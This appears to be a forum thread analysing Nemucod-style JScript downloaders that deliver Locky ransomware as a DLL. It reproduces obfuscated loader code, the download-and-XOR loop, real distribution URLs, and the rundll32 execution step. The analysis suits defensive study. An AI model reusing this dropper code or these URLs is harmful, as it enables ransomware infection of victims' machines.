In bold, the main do..while "infinite" loop (once run, the script tries to download the obfuscated payload until it is successfully done and deobfuscated, or if the script is stopped)

=> the important parts of the script are easy to read only after var replacement :)

Example :

var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
var Ia = "write" + "";
var Oy1 = "open" + "";

and later :


var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

=> Similar to previous analysis for nemucod / new locky as dll

An obfuscated payload is downloaded by the script, then deobfuscated by several decipher functions, XOR etc, to become a real .dll file (old version : exe file)

var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";


=> one of them is used to run the dll, depending on architecture of proc


Here for details (with some links to complete deobfuscated previous version)
https://malwaretips.com/threads/new...rojandownloader-nemucod-asx-26_08_2016.62839/


4) Important parts :


4-1) Connection :

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];
for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {
try {
var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};


We have to replace the vars with its contents to better understand :)

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> one of this methods used for connection (first available)

var Ma6 = WScript["CreateObject"](Zm6[index]);​


4-2) URLs

var TIk = [
LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1,
TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5,
TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8,
TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc​
];​

With replacements :

http ://maydayen.net/e3ib4f
http: //adzebury.com/dsd7gk
http: //duelrid.com/b9m1t
http: //smilehymy.com/f72gngb
http: //smilehymy.com/f72gngb
(not an error from me, it appears two times)​


4-3) Payload

var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;


Io = MTm6.ExpandEnvironmentStrings(Nz + OPo)

Nz + OPo = "%TEMP%/"
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"

Ri6 + TPc8 + DXl1 + Ag = "VfqAQwQEZPrY"

Dc + Ay1 = ".dll"
=> var IVi2 =
"%TEMP%/VfqAQwQEZPrY.dll"

it uses the short path used by programs that require the earlier 8.3 file naming convention.

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> VFQAQW~1.DLL

run => rundll32.exe %TEMP%\VFQAQW~1.DLL,qwerty 323

qwerty => function called
323 => parameter

New Locky ransomware as dll

5) Main Loop :


var El = "";
var fso = new
ActiveXObject("Scripting.FileSystemObject");
var Em = 0;

var Uw = [18807, 7552, 23965];
var WBe = Uw.slice();

WBe[0] = Math.random() * 29999 | 0;


do {

if (fso.FileExists(dll_file)) {
var oFile = fso.GetFile(dll_file);
var dll_file_short = oFile.
ShortPath;
El = dll_file_short +
".txt"

if (fso.FileExists(El)) {

this[WScript]["quit"](0);
}
}
try {

if (0 == Em) {

var Gr = random(Tab_Urls.length, WBe);
=> first call of their random function to obfuscate a bit more
=> here, it gives a random "good" index, to begin the loop in the urls tab :rolleyes:

=> but only because Wbe first value is a random value :)
function random(range, s) {
s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);
}
oHttp.open("GET", Tab_Urls[Gr++ % Tab_Urls.length], false);

oHttp.
send();

while (oHttp.
readystate < 4)) WScript.Sleep(100);
var oStream = WScript.
CreateObject("ADODB.Stream");
oStream.
open();
oStream.
type = 1;
oStream.
write(oHttp.ResponseBody);
oStream.
position = 0;
oStream.
SaveToFile(file , 2);
oStream.
close();

var file_content = ReadTextFromFile_char_substitution_1(file);
file_content = deobfuscation( file_content);

if ( file_content.
length < 102400 || file_content.length > 235520) {
continue;
}

WriteTextToFile_char_substitution_2(dll_file, file_content);
Em = 1;
}

var oFile = fso.
GetFile(dll_file);

var dll_file_short = oFile.
ShortPath;

MTm6.
Run("...rundll32.exe" + " " + dll_file_short + ",qwerty 323");

WScript.
Sleep(20000);
} catch (e) {
WScript.Sleep(1000);

continue;
};
} while (1);

WScript.
Quit(0);


6) Random function - false random :)


function random(range, s) {
s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.floor(r * range);
}

it takes two parameters, none part inside is linked to random :D

First time it is called

var Uw = [18807, 7552, 23965];

var WBe = Uw.slice(); => still [18807, 7552, 23965] :rolleyes:

WBe[0] = Math.random() * 29999 | 0;
=> real random part : first value 18807 is replaced by a value between 0 and 29999

var Gr = random(Tab_Urls.length, WBe); => here random will only depends of WBe first value

Second time it is called : the famous XOR part (see previous analysis) :

for (var index =0 ; OPr3 < IGv7.length ; index++) {
IGv7[index] ^= random(256, AJf);
}

with AJf = Uw = [18807, 7552, 23965]; => never changes ;)

=> this time, not a random value :)

=> 118
----------------------------------------------------------------------------------------------------
NEXT PART : 4 d7f8c742cd.html (quick because similar to above sample)
----------------------------------------------------------------------------------------------------
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
PART 2 : d7f8c742cd.html

1) What it looks like when edited


<job id=1>
<script target="about:blank" language="JScript">

var PWf = ["__Lz", "__Dr", "__Yw", "__Zs", "__Id", "__GVj", "__LGq", "__Yw", "__Ss", "__FWb", "__Gl", "__DOv", "__KJn", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__EMm", "__Nw", "__GVj", "__Ts", "__Dr", "__EFn", "__Qf", "__Lz", "__Dr", "__Nw", "__Id", "__EFn", "__Qf", "__Ss", "__Dh", "__Ss", "__EWd", "__Xm", "__CJk", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__Zs", "__EWd", "__Qv", "__EWd", "__Xe", "__EWd", "__Qv", "__EWd", "__GVj", "__EWd", "__Qv", "__EWd", "__VKf", "__Id", "__EWd", "__ZMl", "__Sa", "__Ss", "__Ss", "__Ss", "__Ss", "__KYm", "__Zc", "__Xe", "__Ss", "__EHy", "__Zs", "__Ss", "__Dh", "__Ss", "__EWd", "__Ee", "__Gk", "__CJk", "__Ts", "__EWd", "__Qv", "__EWd", "__Nw", "__Id", "__EWd", "__Qv", "__EWd", "__EWd", "__Qv", "__EWd", "__FWb", "__PUe", "__EWd", "__Qv", "__EWd", "__AHd", "__LGq", "__LGq", "__Id", "__Ee", "__Gk", "__Ee", "__Ee", "__Nw", "__EWd", "__Qv", "__EWd", "__Ts", "__Nw", "__Id", "__FWb", "__PUe", "__Qz", "__ALu", "__Ee", "__Ee", "__Zs", "__PUe", "__EFn", "__Ig", "__EWd", "__Qv", "__EWd", "__FWb", "__Us", "__EWd",
...
...
"__Dr", "__Ig", "__VKf", "__Dr", "__Nw", "__EMm", "__Gl", "__CJk", "__Id", "__Xe", "__GVj", "__Yw", "__Qf", "__QKo", "__NDw", "__XHb", "__Zs", "__Ss", "__Qv", "__Ss", "__ZQn", "__NDw", "__Nw", "__Ss", "__Qv", "__Ss", "__Ac", "__VKf", "__Nu", "__Gl", "__Ji0", "__XHb", "__Us", "__Qz", "__DOv", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__EAw", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__GOn", "__Yw", "__ALu", "__Dh", "__SUa", "__Dr", "__QKo", "__SUa", "__Dr", "__Qv0", "__Nu", "__Gl", "__EWd", "__EWd", "__DOv", "__ZMl", "__CPs", "__Sa", "__Te", "__CPs", "__Sa", "__Te", "__Xe", "__FWb", "__Id", "__Dr", "__Xe", "__Yw", "__Ss", "__GOn", "__Yw", "__ALu", "__ZMl", "__CPs", "__Sa", "__EAw", "__ZMl", "__CPs", "__Sa", "__CPs", "__Sa"
];

var HKc = "";
var Bv = {
"__Sa": (1, "\x0a"),
"__CPs": (1, "\x0d"),
"__DMb": (1, "D"),
"__Vf": (1, "H"),
"__XOq": (1, "L"),
"__Ac": (1, "P"),
"__XRb": (1, "T"),
"__EZe": (1, "X"),
"__Te": (1, "\x09"),
"__EFn": (1, "d"),
"__EMm": (1, "h"),
"__Dt": (1, "l"),
"__VKf": (1, "p"),
"__Id": (1, "t"),
"__EAw": (1, "\x7d"),
"__TLw": (1, "\x7c"),
"__KJn": (1, "\x7b"),
"__MKt": (1, "\x2f"),
"__Uv": (1, "\x2d"),
"__Ig": (1, "\x2e"),
"__Qv": (1, "\x2b"),
"__Jy": (1, "\x2c"),
"__BOo": (1, "\x2a"),
"__ITb": (1, "C"),
"__GOn": (1, "G"),
"__Ja": (1, "K"),
"__NDw": (1, "O"),
"__CJk": (1, "S"),
"__Gk": (1, "\x25"),
"__EWd": (1, "\x22"),
"__Xm": (1, "W"),
"__Us": (1, "x"),
"__Gl": (1, "\x28"),
"__DOv": (1, "\x29"),
"__Zs": (1, "c"),
"__Qf": (1, "g"),
"__VTv": (1, "k"),
"__LGq": (1, "o"),
"__Nw": (1, "s"),
"__NWq": (1, "w"),
"__Ss": (1, "\x20"),
"__Wv": (1, "\x21"),
"__Qv0": (1, "\x31"),
"__OOi": (1, "\x30"),
"__Qz": (1, "\x33"),
"__ALu": (1, "\x32"),
"__VKn": (1, "\x35"),
"__Vq": (1, "\x34"),
"__QMt": (1, "\x37"),
"__TGp": (1, "\x36"),
"__USc": (1, "\x39"),
"__Ji": (1, "\x38"),
"__OVr": (1, "\x3a"),
"__JLr": (1, "\x3c"),
"__ZMl": (1, "\x3b"),
"__If": (1, "\x3e"),
"__Dh": (1, "\x3d"),
"__IBi": (1, "F"),
"__Lp": (1, "J"),
"__ZQn": (1, "N"),
"__AHd": (1, "R"),
"__SUa": (1, "V"),
"__Qz0": (1, "Z"),
"__GYd": (1, "b"),
"__KVw": (1, "\x40"),
"__Lz": (1, "f"),
"__QMz": (1, "j"),
"__Yw": (1, "n"),
"__Xe": (1, "r"),
"__KYm": (1, "v"),
"__GNi": (1, "z"),
"__XHb": (1, "B"),
"__Dr": (1, "u"),
"__FMq": (1, "A"),
"__Bu": (1, "E"),
"__Ji0": (1, "I"),
"__Zb": (1, "M"),
"__ZBl": (1, "Q"),
"__EXd": (1, "U"),
"__CAb": (1, "Y"),
"__Zc": (1, "a"),
"__FWb": (1, "e"),
"__GVj": (1, "i"),
"__PUe": (1, "m"),
"__UGt": (1, "q"),
"__EHy": (1, "\x5f"),
"__At": (1, "\x5e"),
"__Nu": (1, "\x5d"),
"__Ee": (1, "\x5c"),
"__QKo": (1, "\x5b"),
"__Ts": (1, "y")
};
var Wy;
for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {

XMm = PWf[Wy];
HKc = (43, 35, HKc) + (25, 35, Bv[XMm]);

}
eval(HKc);

</script>
</job>

2) Explanations :

As an html file, we can see some parts not present on first sample analyzed :

<job id=1>
<script target="about:blank" language="JScript">
...
...
</script>
</job>
just present to allows the execution with good interpreter

The other part looks like the first sample, but less complicated :
=> the first tab no need the split function to obtain a tab of "keys" : it is directly done.

For the rest , same explanation :

for (Wy = 0; Wy < PWf["l" + "e" + "n" + "gth"]; Wy++) {
XMm = PWf[Wy];
HKc = (43, 35, HKc) + (25, 35, Bv[XMm]);
=> HKc = HKc + Bv[XMm];​
}

eval(HKc); => evaluate the HKc string, result of first deobfuscation

3) What it looks like after first deobfuscation :

It looks like the same as previous sample, with some parts that change :

- var Uw = [21692, 4331, 983];
=> main tab used with different values (normal, for the XOR part, another number is used, not 118)

- URLs parts

- Payload Parts​

4) Important parts :

4-1) Connection :

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];
for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {
try {

var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};

We have to replace the vars with its contents to better understand :)

var Zm6 = [ "MSXML2.XMLHTTP","WinHttp.WinHttpRequest.5.1"]

=> one of this methods used for connection (first available)

var Ma6 = WScript["CreateObject"](Zm6[index]);

4-2) URLs

var TIk = [
Ed + Zw0 + KTl3 + KFg2 + Rq + KFg2 + Gd5 + FQs + Gn4 + Wt4 + Mo + XSj3 + Mo0 + Sa,
Ed + RAn + Ze1 + Rj + Hj + Za2 + Vq + Wk + Ke + JPy + Vu0 + ROp2,
Ed + Zw0 + Bl4 + GBr2 + AZc + Xz7 + AYc8 + XSq6 + EDr2 + EXd + Oa9 + Vp + Gy50,
Ze + VQk + Rj + Hj + Ag + Oz0 + XSq6 + BYp2 + Gb + Vu0 + ROp2,
Ed + Zw0 + Uu7 + GPw + FOx8 + AUi + OPo + LTv + NGu8 + XNe + Kz9 + Dc​
];

With replacements :

http ://lookbookinghotels.ws/fnectl9i
http ://one4four1.ws/lt94ccs
http ://trybttr.ws/vygvb3zm
http ://one4four1.ws/lt94ccs
http ://one4four1.ws/lt94ccs
(still twice the same urls ... bug !?)​


4-3) Payload

var Io = MTm6.ExpandEnvironmentStrings(En2 + QNu);
var Lp9 = Io + IBm7 + Dc0 + FAt8 + IZr;
var IVi2 = Lp9 + En7 + QBp;​


Io = MTm6.ExpandEnvironmentStrings(En2 + QNu)

En2 + QNu = "%TEMP%/"

var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);

MOq + Lf4 + Xf0 = "CreateObject"
LSk + Fk + OHb + PVg7 + Tp7 = "WScript.Shell"
=> MTm6 = WScript.CreateObject("WScript.Shell")

IBm7 + Dc0 + FAt8 + IZr = "WKeKTuYpXoXjHaWZ"
En7 + QBp = ".dll"

=> var IVi2 = '%TEMP%WKeKTuYpXoXjHaWZ'.dll"

it uses the short path used by programs that require the earlier 8.3 file naming convention.

var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;

=> WKEKTU~1.DLL


run => rundll32.exe %TEMP%\WKEKTU.DL,qwerty 323

qwerty => function called
323 => parameter

New Locky ransomware as dll

5) Main Loop :

No changes

6) False random function :

function random(range, s) {
s[0] = 171 * s[-6915 + 6915] % 30269;
s[1] = (5745 - 5573) * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0;
return Math[OMi0 + Ao4](r * range);
}

Simplified :
function random(range, s) {

s[0] = 171 * s[0] % 30269;
s[1] = 172 * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[1] / 30307 + s[2] / 30323) % 1.0;
return Math.
floor(r * range);
}

var Fm;

var AJf = Uw.slice();

=> [21692, 4331, 983] => s[0] , s[1] and s[2]

=> same random function
=> different values from previous sample for second parameter
=> different integer for the XOR part :D
for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ICc + Rb]; OPr3++) {
IGv7[OPr3] ^= random(256, AJf);
}

=> random(256, AJf) = 256 all the time :rolleyes:

----------------------------------------------------------------------------------------------------
NEXT PART : 2 .js : completely different script, not a nemucod
----------------------------------------------------------------------------------------------------
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Part 3 : 2.js

1) What it looks like when edited


As usual : I made some modifications to avoid copy-paste => saved => run => infection :p

function vella5() {
var ydgicisy8 = ["53070", 'me', "ajutta", "61724", "42722", "65096", "udiwidte"]
return ydgicisy8[1];
}
var vxajy7 = ["99601", 'on'];
var azdyvurc4 = ['Op', "ugidu", "22792", "52245", "rvafwinle", "55932", "72416", "lhysa"];

function ototmu8() {
var wvobycsi = ["nbapy", "16529", "ebcogrisfi", "65715", "DB.", "89015"]
return wvobycsi[4];
}
function rgegqitt() {
var tbosni6 = [];
tbosni6["silu"] = 'yqmoj';
tbosni6["oseho"] = "uqpacevk";
tbosni6["owaqkuti"] = 'pNa';
return tbosni6["owaqkuti"];
}
var ylnurvagr3 = ["58658", "59038", "egarziz", "63169", "WS", "wocge"];

function rufolly() {
var aplotycy = ["c ", "dipnizy", "15990", "opekam", "37005"]
return aplotycy[0];
}
var jtoxri3 = ["erimfyske", "len", "cvakruc"];

function anuruj1() {
var wexasuhg5 = [];
wexasuhg5["isekysco"] = 'kxizor';
wexasuhg5["ryqaws"] = 'Bo';
wexasuhg5["agvyjrupda"] = 'hefeb';
wexasuhg5["itlukbuv"] = 'oqsul';
wexasuhg5["ryrotb"] = "gigfeh";
return wexasuhg5["ryqaws"];
}
var yrat7 = ["face", "tixevi", "tymohvu", "99876", "XOb", "aqbolyr", "23311"];
var biltaloj = [".ex", "94585", "10725", "77481", "cvazagat"];
var wbegukas = ["yrix", "se", "56530", "flulyr", "utmanos", "62839", "ekgiqd", "ytpupn"];

function coppygy() {
var msorivass9 = [];
msorivass9["ubewqehcu"] = "qveha";
msorivass9["tbyvigif"] = 'e';
msorivass9["ijikbo"] = "bdubo";
return msorivass9["tbyvigif"];
}
function obovgenb() {
var wyzeqizh = [];
wyzeqizh["yfoz"] = 'omucyzb';
wyzeqizh["ognyfho"] = "Act";
wyzeqizh["asemu"] = "tyry";
wyzeqizh["dkaxacjo"] = 'wgyrul';
return wyzeqizh["ognyfho"];
}
var ahibo3 = ["amapkomwe", 'Get', "99679", "usataco", "90433", "51823"];
var ybiwecri6 = ['Na', "gilnecp", "yszewnefqo", "70146", "55553", "38322", "gajpiwe", "64331", "39422", "24809"];

function ypyze3() {
var vgajniktolz9 = [];
vgajniktolz9["dnysamvi"] = 'ikyhk';
vgajniktolz9["yfhotewu"] = "cia";
vgajniktolz9["coxzelneh"] = 'mdujatv';
vgajniktolz9["wrajbyhuvd"] = 'uxer';
vgajniktolz9["hideby"] = "fumqe";
return vgajniktolz9["yfhotewu"];
}
var cesegumk = ["ubpekji", "Sh", "mxuznatug", "41857"];
var axraxyfg = ["op", "ymiwqed", "69761", "76968", "ylwuw", "adihy"];

function arqacha8() {
var anupg7 = [];
anupg7["dzecere"] = 'bpitoje';
anupg7["jewhyghem"] = "hteju";
anupg7["ipyd"] = "fodny";
anupg7["yhobukna"] = "cr";
anupg7["xihox"] = 'rurdubwe';
return anupg7["yhobukna"];
}
var pwymujohm = ["olytox", "jec", "djokaski"];

function aqemwe2() {
var ybxuhly = ["13920", "86384", "gu", "znazagfad", "35882", "77784", "uxzekcy", "96195"]
return ybxuhly[2];
}
var vunbej0 = ["dy", "nyjfy"];
var mjykjujej = ["22377", "e /"];

function gbaxhu0() {
var enmihv9 = [];
enmihv9["nijakha"] = 'Re';
enmihv9["jfujmezz"] = 'nkyje';
enmihv9["yzkeruzwu"] = 'abdyxujs';
enmihv9["milipmi"] = "izaf";
return enmihv9["nijakha"];
}
function axyhyz9() {
var ylsimdep7 = ["p?f", "fmuto", "75414", "ogbutf"]
return ylsimdep7[0];
}
function xravsamy() {
var esici1 = ["37426", "izbywro", "21784", "aruzv", "23216", "fnexazavs", "88539", 'e', "zasonran"]
return esici1[7];
}
function umjukliqdy7() {
var wybeq4 = [];
wybeq4["fcapo"] = "Str";
wybeq4["basyrg"] = "nufgekn";
wybeq4["kuxcu"] = "uwrews";
wybeq4["ylazo"] = 'ugdecikn';
return wybeq4["fcapo"];
}
function mzedjyl() {
var ajtotu = [];
ajtotu["ykjytv"] = 'ykgypd';
ajtotu["irfuhqa"] = 'ytwysca';
ajtotu["ybmotcatf"] = "me";
return ajtotu["ybmotcatf"];
}
var ecwyda = ["tus", "57236"];
var dfinoc4 = ["ylrubew", 745, "ngelqa", "affamz", "90524", "ugom", "89122", "otsybxoc", "kmepa"];
var ahmul = ["73535", "85071", "Sta", "necedos", "rrylyhgo", "obzecel", "13831", "cetga", "27221"];
var untyqu9 = ["ixkibfuwi", "38570", "72336", "nt"];

function_hbodrych0() {
var xodyppex9 = [];
xodyppex9["qihge"] = "ekyjo";
xodyppex9["abixku"] = 'te';
xodyppex9["wgovub"] = 'hisu';
xodyppex9["egesg"] = 'wlixo';
return xodyppex9["abixku"];
}
var uwtiq8 = ["31226", 'en', "73707", "23428", "55818", "14746", "cahwoq", "30285", "89537", "12574"];

function yccejihk() {
var kozgy = [];
kozgy["woxqu"] = "g.Fi";
kozgy["hbijukkowh"] = "ahgalbox";
kozgy["xfyjevol"] = "ukura";
return kozgy["woxqu"];
}
var dxyqwab3 = ["ymtakd", "94110", "55328", "efgidmyv", "gqolqesjuvh", "gybze", 392, "ivem"];
var occuza = ["oqhixp", "87259", "ip", "ehqopq", "yvazi", "fpyxseto", "esxub", "ntener"];
var ljubdu = ["os", "32094", "pituwne", "acylqi"];
var mipjaliwr2 = ["89905", 'eTo', "azyhhi", "17271", "fwyhifba", "upzyzv", "agytv", "68899"];

function cuqelh() {
var ukqygn4 = ["79210", "39102", "61866", "26914", "efubyvo", "ubdibzo", "36720", 'pt']
return ukqygn4[7];
}
var opikomg1 = [59, "afcaxikh", "wcogyxk", "12751", "24569", "ylasyjh", "xlura", "59711"];
var ajgepzy = ["10102", "Cl", "iduz"];
var yzkezu = ['\\\\', "hroruti", "sezgoqw", "qpefpezwi", "66299", "zraqjixjo", "aqruw", "22831"];

function irjync6() {
var cqulwo = [];
cqulwo["konubl"] = "paqco";
cqulwo["epdep"] = "itahv";
cqulwo["ihawu"] = "anleni";
cqulwo["owjoql"] = "Spe";
return cqulwo["owjoql"];
}
function hgagremumf1() {
var levbuvs1 = ["64531", "10675", "exycborv", "znignomqeqb", "ri"]
return levbuvs1[4];
}
var mryfcupb = ["igdod", "LHT", "73223", "aryktivfe", "24517", "66030", "carevz", "74591", "utago"];

function upbohykre() {
var lsowpa0 = ["95983", "dvecaly", "11247", "31408", "kynubr", "oos"]
return lsowpa0[5];
}
function owugb() {
var fwimtudulc = [];
fwimtudulc["dibagcix"] = 'uwep';
fwimtudulc["olvisa"] = "qupabg";
fwimtudulc["piwba"] = "uvof";
fwimtudulc["zelvyvfi"] = "me";
return fwimtudulc["zelvyvfi"];
}
var qkusaza = ["avxon", "zmolpejfog", "58506", "yjvoju", "lubjembypk", 838];

function tamru0() {
var uxxuj = ["67228", "ebkifir", "MSX_", "13743", "uxqubb", "99875", "47638", "usuczufi", "29202", "56914"]
return uxxuj[2];
}
function bupy() {
var xhety = [];
xhety["yffecpovqi"] = "elekip";
xhety["trylfy"] = "fgowbyj";
xhety["walehge"] = "ykubsak";
xhety["asehj"] = 'Sc';
xhety["upgenfan"] = 'oboksu';
return xhety["asehj"];
}
function wjucyfas8() {
var araxkejpo1 = [];
araxkejpo1["rriwop"] = "qcofa";
araxkejpo1["azqaxuph"] = "udjurte";
araxkejpo1["zxujsijihd"] = "Ar";
return araxkejpo1["zxujsijihd"];
}
function taca3() {
var qjoxlafn0 = [];
qjoxlafn0["qrultutda"] = "wgefsy";
qjoxlafn0["arahbitci"] = "kbyxtoc";
qjoxlafn0["jultins"] = ".ph";
return qjoxlafn0["jultins"];
}
var ilusbilj = ["13919", "82255", "40577", "14387", "69725", "ti"];
var atnyvky = ["11284", "52223", "96671", "52681", "jylbynb", 'll', "xixgig", "ownevor", "wrefop"];

function dowqi6() {
var mhunso6 = [];
mhunso6["ugoxana"] = "idqudco";
mhunso6["oroqtebx"] = "Obje";
mhunso6["ticob"] = 'ygygow';
mhunso6["ifroq"] = 'oqrudug';
mhunso6["ordyxwyn"] = "jomgi";
return mhunso6["oroqtebx"];
}
var ixmyme7 = ["ML2", "ocqocrewka"];

function ijjabko1() {
var epwifvubf = [];
epwifvubf["axibj"] = "yvmidamt";
epwifvubf["htynarm"] = 'elcybu';
epwifvubf["mxicotx"] = 'n';
return epwifvubf["mxicotx"];
}
var vsali6 = ["Scri", "13275", "huwdej", "ykygqy", "emqux", "50453", "11325", "16013"];
var ojaqo = ["isakol", ".XM", "49002", "jbeqpa", "jabegzojd", "anxuxzopr"];
var picqex = ["ive", "qani", "85879"];

function txidohlegw() {
var exaba = [];
exaba["awtux"] = 'Wri';
exaba["fjapxabhajn"] = "umsoples";
exaba["lydi"] = 'imqydxanq';
exaba["alleqw"] = 'ufhoso';
return exaba["awtux"];
}
var unifhers0 = ['sp', "vkenrydg"];
var fbomorc5 = ["ad.", "kkilyhx", "lolawsi"];
var ewdexsy5 = ["gnilhus", "umbed", "14310", "GET", "28232", "dacinja", "ilquct"];

function ytax9() {
var uwipweta = ["11709", "17211", "obrapqykh", "/ad", "ejqipavbe", "fivole"]
return uwipweta[3];
}
var exednycmu4 = ["28242", 459, "qjintoq", "73304", "97533"];
var aflirvir1 = [275, "ersukkyl", "rbisa", "ofus", "djardyz", "zjuksukdyk", "pysme", "ugugbo"];

function erikyhi() {
var obefufu = ["13173", "98262", "64370", "Fu"]
return obefufu[3];
}
var axpiss = ["22376", "ulfavycy", "22480", "agogjiv", "/ek", "ihyld", "32698", "32124", "95066"];
var nedidot0 = ["utuvnizu", "t", "ylywkuri"];

function mtesqamygl8() {
var dbicqa = [];
dbicqa["uwditp"] = "el";
dbicqa["omzecbac"] = "aholy";
dbicqa["jacqo"] = "adkiki";
return dbicqa["uwditp"];
}
function ossimqe8() {
var adryfmy = ["23328", "mhorahhoqp", "picgecpy", "urejeqp", "awuma", "me", "60017"]
return adryfmy[5];
}
function bvaqfoxic() {
var zefal0 = ["66066", "gekva", "31072", "47813", "aljumdov", "adnaniq", "linywn", 'Sav']
return zefal0[7];
}
var atuvcijby = ["41310", "ljyvkepdalx", "ltyqi", "Get", "vqizevqagh", "mtogiqyq", "urxyvso"];
var anys7 = ["Fil", "otvyfduxo"];
var irqyzp4 = ["uppicj", "47802", "msagtori", "htt", "bavqe", "18723"];

function usogzicy0() {
var bzyfiz3 = ['si', "egyl", "ylpymalh", "87544"]
return bzyfiz3[0];
}
function kbukeqqown2() {
var yshafy = ["livol", "79547", "13134", "35347", "72637", "top", "putquh", "85008"]
return yshafy[5];
}
function jpuqnoxg() {
var hawrewc1 = [];
hawrewc1["unkob"] = "yjyd";
hawrewc1["uwxabgugz"] = "ylnar";
hawrewc1["hcosyg"] = "igqevew";
hawrewc1["oshabode"] = 'dahlibqo';
hawrewc1["bnylryvzad"] = "cmd";
return hawrewc1["bnylryvzad"];
}
function sviniv3() {
var atqodkuw = ["duqydj", "51593", "30671", "t.", "dohzuwta", "55600"]
return atqodkuw[3];
}
var ocefp7 = ["88783", 'ru', "30304", "rbuxcu", "28349", "emjynn", "datap", "ileq"];
var sorajib = ["wgorawa", "93111", "d", "wgajhy"];

function dqicdakv() {
var kqyqxipo = ["15757", "29838", "17813", "p:/", "udaps", "awuhexc", "oqvyxa"]
return kqyqxipo[3];
}
var pgecobo5 = ["76244", "rudbesuk", "s", "jgyhwohfac", "76858"];

function awdycfis() {
var iwom9 = ["60549", "buxywyg", "91232", "icwusly", "ADO"]
return iwom9[4];
}
function ktekpaq8() {
var zfifhakkycn = [];
zfifhakkycn["ivydo"] = 'lde';
zfifhakkycn["ozoji"] = 'fzysyvq';
zfifhakkycn["exgavi"] = "iwokx";
zfifhakkycn["egxysmupy"] = 'anxehpaf';
return zfifhakkycn["ivydo"];
}
function lynatvo1() {
var ansigs = [];
ansigs["gjetdyh"] = "ahipi";
ansigs["uklefq"] = 'tbidlyc';
ansigs["eltivpe"] = "wrydrirv";
ansigs["ejepmogy"] = 'sen';
return ansigs["ejepmogy"];
}
var yjarubh = ["72827", "14300", "99327", "50828", "48704", "20962", "obxuhxuqk", "min"];
var qothoqny0 = ["34656", "dvacdiza", "qihlehjapl", "en", "ewizi"];

function quxa() {
var qfodomsu0 = [];
qfodomsu0["fibispy"] = "okexjug";
qfodomsu0["podpy"] = "jiby";
qfodomsu0["usyrgim"] = "on";
qfodomsu0["ixdosor"] = "goligo";
qfodomsu0["uryjh"] = 'evem';
return qfodomsu0["usyrgim"];
}
var qtymu = ["68872", "77235", "e", "82287"];
var emavor = [WScript, "yjmitsyhn", "ohxonv", "94855"][0];
var akahu7 = ["88459", "jyffakex", "16718", "54771", "78459", "duxylt", "yganiqha", "lkeniqe", "r", "61823"];

function upyqo() {
